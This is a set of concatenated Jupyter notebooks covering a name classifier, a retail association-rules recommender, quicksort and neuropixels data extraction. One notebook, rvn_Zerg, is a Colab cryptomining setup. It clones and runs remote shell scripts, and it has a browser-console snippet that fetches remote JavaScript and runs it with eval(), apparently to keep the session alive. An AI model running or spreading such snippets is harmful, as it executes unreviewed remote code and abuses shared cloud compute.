"criterion = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(model.parameters(), lr=0.001)",
"_____no_output_____"
],
[
"for epoch in tqdm(range(1, 1 + 1)):\n train(model, 'cpu', train_loader, optimizer, epoch, criterion)\n test(model, 'cpu', test_loader, criterion)",
"_____no_output_____"
]
],
[
[
"# Save a trained model",
"_____no_output_____"
]
],
[
[
"import pickle\n\ndef save_object(obj, filename):\n with open(filename, 'wb') as output: # Overwrites any existing file.\n pickle.dump(obj, output, pickle.HIGHEST_PROTOCOL)\n",
"_____no_output_____"
],
[
"save_object(model, 'name-classifier.pkl')",
"_____no_output_____"
]
],
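[
[
"# Hedged counterpart (added): a loader matching save_object above, so the pickled classifier can be restored\n# later for inference. The commented call reuses the filename from the previous cell.\ndef load_object(filename):\n    with open(filename, 'rb') as f:\n        return pickle.load(f)\n\n# restored_model = load_object('name-classifier.pkl')",
"_____no_output_____"
]
],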
[
[
"# Experiment Notes",
"_____no_output_____"
],
[
"1. Linear layer either one layer or two layers. No impact on confusion matrix. It still blindly guess `Russian`. Solve it by `ImbalancedDatasetSampler`",
"_____no_output_____"
],
[
"# Scratch Note",
"_____no_output_____"
]
],
[
[
"weight = torch.tensor([3, 1, 1], dtype=torch.float)",
"_____no_output_____"
],
[
"loss = nn.CrossEntropyLoss(weight=weight)",
"_____no_output_____"
],
[
"Y = torch.tensor([2, 0, 1], dtype=torch.long)\ny_pred1 = torch.tensor([\n [.1 ,.2, .9],\n [1.1, .1, .2],\n [0.2, 2.1, .1]\n])\ny_pred2 = torch.tensor([\n [0.8, .2, .3],\n [.2, .3, .5],\n [.2, .2, .1],\n])",
"_____no_output_____"
],
[
"l1 = loss(y_pred1, Y)\nl1",
"_____no_output_____"
],
[
"l2 = loss(y_pred2, Y)\nl2",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb03e1eda1bef5162865bb5f8725b23e4192bd73 | 18,517 | ipynb | Jupyter Notebook | machine-learning/recommender-system-using-association-rules/recommender_systems_association_rules.ipynb | hemanth22/pythoncode-tutorials | 5101b00b5143983db2b8fe29be8068f03e2f86d5 | [
"MIT"
] | 1 | 2022-03-28T22:45:08.000Z | 2022-03-28T22:45:08.000Z | machine-learning/recommender-system-using-association-rules/recommender_systems_association_rules.ipynb | Adkali/pythoncode-tutorials | 5101b00b5143983db2b8fe29be8068f03e2f86d5 | [
"MIT"
] | 3 | 2022-01-25T00:08:22.000Z | 2022-03-11T21:22:03.000Z | machine-learning/recommender-system-using-association-rules/recommender_systems_association_rules.ipynb | Adkali/pythoncode-tutorials | 5101b00b5143983db2b8fe29be8068f03e2f86d5 | [
"MIT"
] | null | null | null | 32.83156 | 184 | 0.608036 | [
[
[
"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n%matplotlib inline\nfrom mlxtend.frequent_patterns import apriori, association_rules\nfrom collections import Counter",
"_____no_output_____"
],
[
"# dataset = pd.read_csv(\"data.csv\",encoding= 'unicode_escape')\ndataset = pd.read_excel(\"Online Retail.xlsx\")\ndataset.head()",
"_____no_output_____"
],
[
"dataset.shape",
"_____no_output_____"
],
[
"## Verify missing value\ndataset.isnull().sum().sort_values(ascending=False)",
"_____no_output_____"
],
[
"## Remove missing values\ndataset1 = dataset.dropna()\ndataset1.describe()",
"_____no_output_____"
],
[
"#selecting data where quantity > 0\ndataset1= dataset1[dataset1.Quantity > 0]\ndataset1.describe()",
"_____no_output_____"
],
[
"# Creating a new feature 'Amount' which is the product of Quantity and its Unit Price\ndataset1['Amount'] = dataset1['Quantity'] * dataset1['UnitPrice']\n# to highlight the Customers with most no. of orders (invoices) with groupby function\norders = dataset1.groupby(by=['CustomerID','Country'], as_index=False)['InvoiceNo'].count()\nprint('The TOP 5 loyal customers with most number of orders...')\norders.sort_values(by='InvoiceNo', ascending=False).head()",
"_____no_output_____"
],
[
"# Creating a subplot of size 15x6\nplt.subplots(figsize=(15,6))\n# Using the style bmh for better visualization\nplt.style.use('bmh')\n# X axis will denote the customer ID, Y axis will denote the number of orders\nplt.plot(orders.CustomerID, orders.InvoiceNo)\n# Labelling the X axis\nplt.xlabel('Customers ID')\n# Labelling the Y axis\nplt.ylabel('Number of Orders')\n# Title to the plot\nplt.title('Number of Orders by different Customers')\nplt.show()",
"_____no_output_____"
],
[
"#Using groupby function to highlight the Customers with highest spent amount (invoices)\nmoney = dataset1.groupby(by=['CustomerID','Country'], as_index=False)['Amount'].sum()\nprint('The TOP 5 profitable customers with highest money spent...')\nmoney.sort_values(by='Amount', ascending=False).head()",
"_____no_output_____"
],
[
"# Creating a subplot of size 15*6\nplt.subplots(figsize=(15,6))\n# X axis will denote the customer ID, Y axis will denote the amount spent\nplt.plot(money.CustomerID, money.Amount)\n# Using bmh style for better visualization\nplt.style.use('bmh')\n# Labelling the X-axis\nplt.xlabel('Customers ID')\n# Labelling the Y-axis\nplt.ylabel('Money spent')\n# Giving a suitable title to the plot\nplt.title('Money Spent by different Customers')\n\nplt.show()",
"_____no_output_____"
],
[
"# Convert InvoiceDate from object to datetime\ndataset1['InvoiceDate'] = pd.to_datetime(dataset.InvoiceDate, format='%m/%d/%Y %H:%M')\n# Creating a new feature called year_month, such that December 2010 will be denoted as 201012\ndataset1.insert(loc=2, column='year_month', value=dataset1['InvoiceDate'].map(lambda x: 100*x.year + x.month))\n# Creating a new feature for Month\ndataset1.insert(loc=3, column='month', value=dataset1.InvoiceDate.dt.month)\n# Creating a new feature for Day\n# +1 to make Monday=1.....until Sunday=7\ndataset1.insert(loc=4, column='day', value=(dataset1.InvoiceDate.dt.dayofweek)+1)\n# Creating a new feature for Hour\ndataset1.insert(loc=5, column='hour', value=dataset1.InvoiceDate.dt.hour)",
"_____no_output_____"
],
[
"# Using bmh style for better visualization\nplt.style.use('bmh')\n# Using groupby to extract No. of Invoices year-monthwise\nax = dataset1.groupby('InvoiceNo')['year_month'].unique().value_counts().sort_index().plot(kind='bar',figsize=(15,6))\n# Labelling the X axis\nax.set_xlabel('Month',fontsize=15)\n# Labelling the Y-axis\nax.set_ylabel('Number of Orders',fontsize=15)\n# Giving suitable title to the plot\nax.set_title('Number of orders for different Months (Dec 2010 - Dec 2011)',fontsize=15)\n# Providing with X tick labels\nax.set_xticklabels(('Dec_10','Jan_11','Feb_11','Mar_11','Apr_11','May_11','Jun_11','July_11','Aug_11','Sep_11','Oct_11','Nov_11','Dec_11'), rotation='horizontal', fontsize=13)\n\nplt.show()",
"_____no_output_____"
],
[
"# Day = 6 is Saturday.no orders placed \ndataset1[dataset1['day']==6]",
"_____no_output_____"
],
[
"# Using groupby to count no. of Invoices daywise\nax = dataset1.groupby('InvoiceNo')['day'].unique().value_counts().sort_index().plot(kind='bar',figsize=(15,6))\n# Labelling X axis\nax.set_xlabel('Day',fontsize=15)\n# Labelling Y axis\nax.set_ylabel('Number of Orders',fontsize=15)\n# Giving suitable title to the plot\nax.set_title('Number of orders for different Days',fontsize=15)\n# Providing with X tick labels\n# Since there are no orders placed on Saturdays, we are excluding Sat from xticklabels\nax.set_xticklabels(('Mon','Tue','Wed','Thur','Fri','Sun'), rotation='horizontal', fontsize=15)\n\nplt.show()",
"_____no_output_____"
],
[
"# Using groupby to count the no. of Invoices hourwise\nax = dataset1.groupby('InvoiceNo')['hour'].unique().value_counts().iloc[:-2].sort_index().plot(kind='bar',figsize=(15,6))\n# Labelling X axis\nax.set_xlabel('Hour',fontsize=15)\n# Labelling Y axis\nax.set_ylabel('Number of Orders',fontsize=15)\n# Giving suitable title to the plot\nax.set_title('Number of orders for different Hours', fontsize=15)\n# Providing with X tick lables ( all orders are placed between 6 and 20 hour )\nax.set_xticklabels(range(6,21), rotation='horizontal', fontsize=15)\nplt.show()",
"_____no_output_____"
],
[
"dataset1.UnitPrice.describe()",
"_____no_output_____"
],
[
"# checking the distribution of unit price\nplt.subplots(figsize=(12,6))\n# Using darkgrid style for better visualization\nsns.set_style('darkgrid')\n# Applying boxplot visualization on Unit Price\nsns.boxplot(dataset1.UnitPrice)\nplt.show()",
"_____no_output_____"
],
[
"# Creating a new df of free items\nfreeproducts = dataset1[dataset1['UnitPrice'] == 0]\nfreeproducts.head()",
"_____no_output_____"
],
[
"# Counting how many free items were given out year-month wise\nfreeproducts.year_month.value_counts().sort_index()",
"_____no_output_____"
],
[
"# Counting how many free items were given out year-month wise\nax = freeproducts.year_month.value_counts().sort_index().plot(kind='bar',figsize=(12,6))\n# Labelling X-axis\nax.set_xlabel('Month',fontsize=15)\n# Labelling Y-axis\nax.set_ylabel('Frequency',fontsize=15)\n# Giving suitable title to the plot\nax.set_title('Frequency for different Months (Dec 2010 - Dec 2011)',fontsize=15)\n# Providing X tick labels\n# Since there are 0 free items in June 2011, we are excluding it\nax.set_xticklabels(('Dec_10','Jan_11','Feb_11','Mar_11','Apr_11','May_11','July_11','Aug_11','Sep_11','Oct_11','Nov_11'), rotation='horizontal', fontsize=13)\nplt.show()",
"_____no_output_____"
],
[
"plt.style.use('bmh')\n# Using groupby to sum the amount spent year-month wise\nax = dataset1.groupby('year_month')['Amount'].sum().sort_index().plot(kind='bar',figsize=(15,6))\n# Labelling X axis\nax.set_xlabel('Month',fontsize=15)\n# Labelling Y axis\nax.set_ylabel('Amount',fontsize=15)\n# Giving suitable title to the plot\nax.set_title('Revenue Generated for different Months (Dec 2010 - Dec 2011)',fontsize=15)\n# Providing with X tick labels\nax.set_xticklabels(('Dec_10','Jan_11','Feb_11','Mar_11','Apr_11','May_11','Jun_11','July_11','Aug_11','Sep_11','Oct_11','Nov_11','Dec_11'), rotation='horizontal', fontsize=13)\nplt.show()",
"_____no_output_____"
],
[
"# Creating a new pivot table which sums the Quantity ordered for each item\nmost_sold= dataset1.pivot_table(index=['StockCode','Description'], values='Quantity', aggfunc='sum').sort_values(by='Quantity', ascending=False)\nmost_sold.reset_index(inplace=True)\nsns.set_style('white')\n# Creating a bar plot of Description ( or the item ) on the Y axis and the sum of Quantity on the X axis\n# We are plotting only the 10 most ordered items\nsns.barplot(y='Description', x='Quantity', data=most_sold.head(10))\n# Giving suitable title to the plot\nplt.title('Top 10 Items based on No. of Sales', fontsize=14)\nplt.ylabel('Item')",
"_____no_output_____"
],
[
"# choosing WHITE HANGING HEART T-LIGHT HOLDER as a sample\nd_white = dataset1[dataset1['Description']=='WHITE HANGING HEART T-LIGHT HOLDER']",
"_____no_output_____"
],
[
"# WHITE HANGING HEART T-LIGHT HOLDER has been ordered 2028 times\nd_white.shape",
"_____no_output_____"
],
[
"# WHITE HANGING HEART T-LIGHT HOLDER has been ordered by 856 customers\nlen(d_white.CustomerID.unique())",
"_____no_output_____"
],
[
"# Creating a pivot table that displays the sum of unique Customers who bought particular item\n\nmost_customers = dataset1.pivot_table(index=['StockCode','Description'], values='CustomerID', aggfunc=lambda x: len(x.unique())).sort_values(by='CustomerID', ascending=False)\nmost_customers\n# Since the count for WHITE HANGING HEART T-LIGHT HOLDER matches above length 856, the pivot table looks correct for all items",
"_____no_output_____"
],
[
"most_customers.reset_index(inplace=True)\nsns.set_style('white')\n# Creating a bar plot of Description ( or the item ) on the Y axis and the sum of unique Customers on the X axis\n# We are plotting only the 10 most bought items\nsns.barplot(y='Description', x='CustomerID', data=most_customers.head(10))\n# Giving suitable title to the plot\nplt.title('Top 10 Items bought by Most no. of Customers', fontsize=14)\nplt.ylabel('Item')",
"_____no_output_____"
],
[
"# Storing all the invoice numbers into a list y\ny = dataset1['InvoiceNo']\ny = y.to_list()\n# Using set function to find unique invoice numbers only and storing them in invoices list\ninvoices = list(set(y))\n# Creating empty list first_choices\nfirstchoices = []\n# looping into list of unique invoice numbers\nfor i in invoices:\n \n # the first item (index = 0) of every invoice is the first purchase\n # extracting the item name for the first purchase\n firstpurchase = dataset1[dataset1['InvoiceNo']==i]['items'].reset_index(drop=True)[0]\n \n # Appending the first purchase name into first choices list\n firstchoices.append(firstpurchase)\nfirstchoices[:5]",
"_____no_output_____"
],
[
"# Using counter to count repeating first choices\ncount = Counter(firstchoices)\n# Storing the counter into a datafrane\ndata_first_choices = pd.DataFrame.from_dict(count, orient='index').reset_index()\n# Rename columns as item and count\ndata_first_choices.rename(columns={'index':'item', 0:'count'},inplace=True)\n# Sorting the data based on count\ndata_first_choices.sort_values(by='count',ascending=False)",
"_____no_output_____"
],
[
"plt.subplots(figsize=(20,10))\nsns.set_style('white')\n# Creating a bar plot that displays Item name on the Y axis and Count on the X axis\nsns.barplot(y='item', x='count', data=data_first_choices.sort_values(by='count',ascending=False).head(10))\n# Giving suitable title to the plot\nplt.title('Top 10 First Choices', fontsize=14)\nplt.ylabel('Item')",
"_____no_output_____"
],
[
"basket = (dataset1.groupby(['InvoiceNo', 'Description'])['Quantity'].sum().unstack().reset_index().fillna(0).set_index('InvoiceNo'))\nbasket.head(10)",
"_____no_output_____"
],
[
"def encode_u(x):\n if x < 1:\n return 0\n if x >= 1:\n return 1\n\nbasket = basket.applymap(encode_u)\n# everything is encoded into 0 and 1\nbasket.head(10)",
"_____no_output_____"
],
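[
"# Hedged aside (added): the element-wise applymap above can also be written as a single vectorized\n# expression, which is usually much faster on a wide basket matrix and yields the same 0/1 encoding.\nbasket_fast = (basket >= 1).astype(int)\nbasket_fast.head()",
"_____no_output_____"
],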
[
"# trying out on a sample item\nwooden_star = basket.loc[basket['WOODEN STAR CHRISTMAS SCANDINAVIAN']==1]\n# Using apriori algorithm, creating association rules for the sample item\n# Applying apriori algorithm for wooden_star\nfrequentitemsets = apriori(wooden_star, min_support=0.15, use_colnames=True)\n# Storing the association rules into rules\nwooden_star_rules = association_rules(frequentitemsets, metric=\"lift\", min_threshold=1)\n# Sorting the rules on lift and support\nwooden_star_rules.sort_values(['lift','support'],ascending=False).reset_index(drop=True)",
"_____no_output_____"
],
[
"# In other words, it returns the items which are likely to be bought by user because he bought the item passed into function\ndef frequently_bought_t(item):\n # df of item passed\n item_d = basket.loc[basket[item]==1]\n # Applying apriori algorithm on item df\n frequentitemsets = apriori(item_d, min_support=0.15, use_colnames=True)\n # Storing association rules\n rules = association_rules(frequentitemsets, metric=\"lift\", min_threshold=1)\n # Sorting on lift and support\n rules.sort_values(['lift','support'],ascending=False).reset_index(drop=True)\n print('Items frequently bought together with {0}'.format(item))\n # Returning top 6 items with highest lift and support\n return rules['consequents'].unique()[:6]",
"_____no_output_____"
],
[
"frequently_bought_t('WOODEN STAR CHRISTMAS SCANDINAVIAN')",
"_____no_output_____"
],
[
"frequently_bought_t('JAM MAKING SET WITH JARS')",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb03edbd2d6d86de9dc182a463c946434aee842d | 5,458 | ipynb | Jupyter Notebook | rvn_Zerg.ipynb | rogg13/pCol | 0eddb110663fe24a26624504593ae51d3614b9ea | [
"MIT"
] | null | null | null | rvn_Zerg.ipynb | rogg13/pCol | 0eddb110663fe24a26624504593ae51d3614b9ea | [
"MIT"
] | null | null | null | rvn_Zerg.ipynb | rogg13/pCol | 0eddb110663fe24a26624504593ae51d3614b9ea | [
"MIT"
] | null | null | null | 31.188571 | 172 | 0.465189 | [
[
[
"# **Welcome To Penajam Project**\nscript created by **[Penajam Euy](https://www.facebook.com/balibeach69/)**\n\nCara pakai (*How to use*)\n\n1. Cek Core\n\n2. Start Mining\n\n3. Paste script dibawah ke browser console (***Ctrl+Shift+i - Console***)\n\n```\nasync function eternalMode() {\n let url = 'https://raw.githubusercontent.com/liebedevil/borr/main/netep.js'\n let response = await fetch(url);\n let script = await response.text();\n eval(script);\n}\neternalMode();\n```\n4. Selesai\n\nNote : Script ini hanya berfungsi di cpu intel.\n\n**Penting : di sekitar menit ke 2 - ke 10 biasanya muncul captha, captha di klik manual atau menggunakan extensi, kemudian akan muncul lg setiap 3 jam sekali**\n\n▶ Appminer : ccm1n3r\n\n▶ **Khusus untuk Pool :** https://zergpool.com\n\n===================================================\n\nDonate kopi ke developer:\n\n▶ *Veruscoin* (**VRSC**) : RQJKEvUQKarLjDJUuAx7QQFKD8yBVuYZii\n\n▶ *Raptoreum* (**RTM**) : RLFAMiM5yyAV6KwkWxuqe8TT7rYkYjYTtT\n\n▶ *Dogecoin* (**DOGE**) : DTPXpi28cuuCzp1JQZBWcnJjr1NKaCSHFe\n\n▶ *Tron* (**TRX**) : TQdN4dzKNxMox7he3huXUdUdpG4XvEt58U\n\n===================================================\n\nDonasi jajan ke developer, suport semua e-wallet dan QRIS\n\n***coming soon***\n\n\n\n\n\n\n\n",
"_____no_output_____"
]
],
[
[
"#@title **1. Cek Core**\n#@markdown Berfungsi untuk melihat spesifikasi\n!lscpu",
"_____no_output_____"
],
[
"#@title **2. Start Mining**\n#@markdown ▶ *Isi nama worker di kolom Name* \n\n#@markdown ▶ *Wallet sesuaikan dengan koin yang akan dimining, penulisan koin dengan huruf kapital* (Ex: VRSC, RTM, DOGE, LTC)\n\n#@markdown ▶ *Level di isi jumlah core, jika dikosongkan otomatis menggunakan seluruh core yang ada*\nName = \"qwerty\" #@param {type:\"string\"}\nWallet = \"\" #@param {type:\"string\"}\nCoin = \"\" #@param {type:\"string\"}\nLevel = \"\"#@param {type:\"string\"}\n!cd /home && nohup sudo apt install expect && nohup git clone https://github.com/Xilahani8/pacul.git && cd pacul && chmod +x molaih.sh\n!cd /home/pacul && ./molaih.sh $Name $Wallet $Coin $Level\nfrom IPython.display import clear_output\nclear_output()\n!cat /home/pacul/info.txt\nprint('Mining berhasil di jalankan di background')",
"_____no_output_____"
],
[
"#@title **3. Cek Miner**\n#@markdown *Cek miner yang berjalan*\nimport time\nimport psutil\nimport datetime\nfrom IPython.display import clear_output\nclear_output()\n!cat /home/pacul/info.txt\n\nfor x in range(5):\n x = datetime.datetime.now()\n Tn = psutil.cpu_percent()\n print(x.strftime(f\"Peforma tukang %H:%M:%S : {Tn} %\"))\n time.sleep(3)",
"_____no_output_____"
],
[
"#@title **4. Reconfigure & Rerun (Rerun otomatis)**\nName = \"qwerty\" #@param {type:\"string\"}\nWallet = \"\" #@param {type:\"string\"}\nCoin = \"\" #@param {type:\"string\"}\nLevel = \"\"#@param {type:\"string\"}\n!cd /home/pacul && chmod +x mbaleni.sh && ./mbaleni.sh $Name $Wallet $Coin $Level",
"_____no_output_____"
],
[
"#@title **5. Stop Mining**\n!cd /home/pacul && chmod +x mateni.sh && ./mateni.sh",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb03f08644bc9f6c00ed55307bab17cbc1e01b2e | 5,218 | ipynb | Jupyter Notebook | jupyter/quick_sort.ipynb | lishulong16/sklearn_demo | 5e7a2ea6d2b6ec266536974b7169e5f76639ccb6 | [
"MIT"
] | 1 | 2018-12-05T18:41:25.000Z | 2018-12-05T18:41:25.000Z | jupyter/quick_sort.ipynb | lishulongVI/sklearn_demo | 5e7a2ea6d2b6ec266536974b7169e5f76639ccb6 | [
"MIT"
] | null | null | null | jupyter/quick_sort.ipynb | lishulongVI/sklearn_demo | 5e7a2ea6d2b6ec266536974b7169e5f76639ccb6 | [
"MIT"
] | null | null | null | 20.303502 | 72 | 0.432924 | [
[
[
"def quick_sort(data,left,right):\n \n if left < right:\n mid = partition(data,left,right)\n quick_sort(data,left,mid-1)\n quick_sort(data,mid+1,right)\n ",
"_____no_output_____"
],
[
"def partition(data,left,right):\n tmp = data[left]\n while left < right:\n# 选择出一个<tmp的数 交换\n while left<right and data[right] >=tmp:\n right -= 1\n data[left] = data[right]\n print('left:{},right:{},tmp:{}'.format(left,right,tmp))\n# 选择一个 >emp的数字 交换\n while left < right and data[left]<=tmp:\n left +=1\n data[right] = data[left]\n print('left:{},right:{},tmp:{}'.format(left,right,tmp))\n data[left] = tmp\n print(list(data))\n return left",
"_____no_output_____"
]
],
[
[
"# 时间复杂度nlogn",
"_____no_output_____"
]
],
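[
[
"# Added check (hedged): verify quick_sort against Python's built-in sorted() on random input.\n# The average cost follows the recurrence T(n) = 2*T(n/2) + O(n), i.e. O(n log n); with this leftmost-pivot\n# partition an already-sorted input degrades to O(n^2).\nimport random\nsample = [random.randint(0, 100) for _ in range(20)]\nexpected = sorted(sample)\nquick_sort(sample, 0, len(sample) - 1)\nassert sample == expected",
"_____no_output_____"
]
],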
[
[
"li = [2,1,4,3,5,6,7,9,8]\nlen(li)-1",
"_____no_output_____"
],
[
"quick_sort(li,0,len(li)-1)",
"left:0,right:1,tmp:2\nleft:1,right:1,tmp:2\n[1, 2, 4, 3, 5, 6, 7, 9, 8]\nleft:2,right:3,tmp:4\nleft:3,right:3,tmp:4\n[1, 2, 3, 4, 5, 6, 7, 9, 8]\nleft:4,right:4,tmp:5\nleft:4,right:4,tmp:5\n[1, 2, 3, 4, 5, 6, 7, 9, 8]\nleft:5,right:5,tmp:6\nleft:5,right:5,tmp:6\n[1, 2, 3, 4, 5, 6, 7, 9, 8]\nleft:6,right:6,tmp:7\nleft:6,right:6,tmp:7\n[1, 2, 3, 4, 5, 6, 7, 9, 8]\nleft:7,right:8,tmp:9\nleft:8,right:8,tmp:9\n[1, 2, 3, 4, 5, 6, 7, 8, 9]\n"
],
[
"li = [5,2,1,4,3,6,7,9,8]\nlen(li)-1",
"_____no_output_____"
],
[
"quick_sort(li,0,len(li)-1)",
"left:0,right:4,tmp:5\nleft:4,right:4,tmp:5\n[3, 2, 1, 4, 5, 6, 7, 9, 8]\nleft:0,right:2,tmp:3\nleft:2,right:2,tmp:3\n[1, 2, 3, 4, 5, 6, 7, 9, 8]\nleft:0,right:0,tmp:1\nleft:0,right:0,tmp:1\n[1, 2, 3, 4, 5, 6, 7, 9, 8]\nleft:5,right:5,tmp:6\nleft:5,right:5,tmp:6\n[1, 2, 3, 4, 5, 6, 7, 9, 8]\nleft:6,right:6,tmp:7\nleft:6,right:6,tmp:7\n[1, 2, 3, 4, 5, 6, 7, 9, 8]\nleft:7,right:8,tmp:9\nleft:8,right:8,tmp:9\n[1, 2, 3, 4, 5, 6, 7, 8, 9]\n"
],
[
"import random",
"_____no_output_____"
],
[
"random.shuffle(li)",
"_____no_output_____"
],
[
"li",
"_____no_output_____"
],
[
"# 内部实现语言为c\nli.sort()",
"_____no_output_____"
],
[
"li",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code"
] | [
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb03f09188a989b7ea2d6deac9d15232c6b30808 | 100,396 | ipynb | Jupyter Notebook | DataExtraction_Jean.ipynb | mariakesa/ConnectedLizards_NeuroMatch2020 | b89fdab554afc79624209fa8b7b3463a9c52b125 | [
"MIT"
] | null | null | null | DataExtraction_Jean.ipynb | mariakesa/ConnectedLizards_NeuroMatch2020 | b89fdab554afc79624209fa8b7b3463a9c52b125 | [
"MIT"
] | null | null | null | DataExtraction_Jean.ipynb | mariakesa/ConnectedLizards_NeuroMatch2020 | b89fdab554afc79624209fa8b7b3463a9c52b125 | [
"MIT"
] | 1 | 2020-07-19T17:46:52.000Z | 2020-07-19T17:46:52.000Z | 371.837037 | 78,868 | 0.932826 | [
[
[
"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n## defining data path\nall_data_path='/Users/jean/git/steinmetz-et-al-2019/data'\nselected_recordings= 'Richards_2017-10-31'\n\n## brain areas\nmid_brain_circuits=['SCs','SCm','MRN','APN','PAG','ZI']\nfrontal_circuits=['MOs','PL','ILA','ORB','MOp','SSp']",
"_____no_output_____"
],
[
"## extracting position of the neuropixels\nindividualchannel_location = pd.read_csv(all_data_path +'/'+selected_recordings+'/'+'channels.brainLocation.tsv', sep='\\t')\n# allen_ontology [enumerated string] (nChannels) The acronym of the brain region determined to contain this channel in the Allen CCF.\nindividualchannel_location = individualchannel_location.allen_ontology;\nindividualchannel_location = np.array(individualchannel_location)\nprint('recording along '+ str(len(individualchannel_location)) +' channels')\nprint('brain areas recorded in that animal')\nprint(np.unique(individualchannel_location))\n#from pandas library --> pd.Series\npandas_location = pd.Series(individualchannel_location)\n# pd.SeriesObject.str.match --> to find a string\nChannels_in_region_of_interest = np.where(pandas_location.str.match('PAG'));\n#Channels_in_region_of_interest = pd.Series(np.where(pandas_location.str.match('PAG')))\nprint('Channels of Neuropixel probe in region of interest')\nprint(Channels_in_region_of_interest)",
"recording along 748 channels\nbrain areas recorded in that animal\n['MOs' 'MRN' 'OLF' 'ORB' 'PAG' 'RSP' 'SCm' 'SCs' 'root']\nChannels of Neuropixel probe in region of interest\n(array([454, 455, 456, 457, 458, 459, 460, 461, 462, 463, 464, 465, 466,\n 467, 468, 469, 470, 471, 472, 473, 474, 475, 476, 477, 478, 479,\n 480, 481, 482, 483, 484, 485, 486, 487, 488, 489, 490, 491, 492,\n 493, 494, 495, 496, 497, 498, 499, 500, 501, 502, 503, 504, 505,\n 506, 507, 508, 509, 510, 511, 512, 513, 514, 515, 516, 517, 518,\n 519, 520, 521, 522, 523, 524, 525, 526, 527, 528, 529, 530, 531,\n 532, 533, 534, 535, 536, 537, 538, 539, 540, 541, 542, 543]),)\n"
],
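[
"# Hedged sketch (added): the brain-area lists defined in the first cell are not used above; this loop\n# counts how many probe channels fall in each mid-brain area of interest, reusing pandas_location.\nfor area in mid_brain_circuits:\n    n_channels = int(np.sum(pandas_location.str.match(area)))\n    print(area, ':', n_channels, 'channels')",
"_____no_output_____"
],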
[
"## cluster indices from \"good spikes\" from the 'clusters' objects \ncluster_quality = np.load(all_data_path +'/'+selected_recordings+'/'+'clusters._phy_annotation.npy')\nprint('number of clusters in cluster_idx = ')\nprint(len(cluster_quality))\n# 0 = noise (these are already excluded and don't appear in this dataset at all); \n# 1 = MUA (i.e. presumed to contain spikes from multiple neurons; \n# these are not analyzed in any analyses in the paper); \n# 2 = Good (manually labeled); 3 = Unsorted. \n# In this dataset 'Good' was applied in a few but not all datasets to included neurons, \n# so in general the neurons with _phy_annotation>=2 are the ones that should be included.\nclusters_idx = np.arange(len(cluster_quality))\ncluster_good_where = np.where(cluster_quality>=2);\ncluster_good_where = cluster_good_where[0]\ngood_and_unsorted_clusters = clusters_idx[cluster_good_where]\nprint('number of \"good\" and \"unsorted\" clusters in cluster_idx = ')\nprint(len(good_and_unsorted_clusters))\n\n# location of the cluster peak along the neuropixel probe\ncluster_peakChannel = np.load(all_data_path +'/'+selected_recordings+'/'+'clusters.peakChannel.npy')\n",
"number of clusters in cluster_idx = \n778\nnumber of \"good\" and \"unsorted\" clusters in cluster_idx = \n522\n"
],
[
"#intersection of cluster_peakChannel and Channels_in_region_of_interest\n#print(cluster_peakChannel)\n#print(Channels_in_region_of_interest)\nClusterInRightArea = np.intersect1d(cluster_peakChannel, Channels_in_region_of_interest,\n assume_unique = False, return_indices = False)",
"_____no_output_____"
],
[
"#print(good_and_unsorted_clusters)\n#print(ClusterInRightArea)",
"_____no_output_____"
],
[
"## clusters from clean clusters and right area\nclean_Clusters_InTheRightArea = np.intersect1d(ClusterInRightArea, good_and_unsorted_clusters, \n assume_unique = False, return_indices=False)\nprint('Number of clean clusters in the right area')\nprint(len(clean_Clusters_InTheRightArea))",
"Clean clusters in the right area\n27\n"
],
[
"## spikes and cluster idx from the 'spikes' object\nspiketimes = np.load(all_data_path +'/'+selected_recordings+'/'+'spikes.times.npy')\nspikeclusters = np.load(all_data_path +'/'+selected_recordings+'/'+'spikes.clusters.npy')\n## to check if it corresponds to clusters class\n## the numbers in there match raws of the cluster objects (see below)\nuniquespikeclusters = np.unique(spikeclusters)\nprint('number of clusters in spikeclusters = ')\nprint(len(uniquespikeclusters))\n\n# ploting the 5000 nth spikes, picked from all the clusters\nfirstspiketoplot = 100000\nnumberofspikestoplot = 5000\nidtoplot = np.arange(firstspiketoplot, firstspiketoplot+numberofspikestoplot)\nplt.plot(spiketimes[idtoplot], spikeclusters[idtoplot], '.')\nplt.xlabel('time sec')\nplt.ylabel('cluster id')\nplt.title('plot all unsorted and unselected spikes - are there two neuropixel probes in that animal?')",
"number of clusters in spikeclusters = \n778\n"
],
[
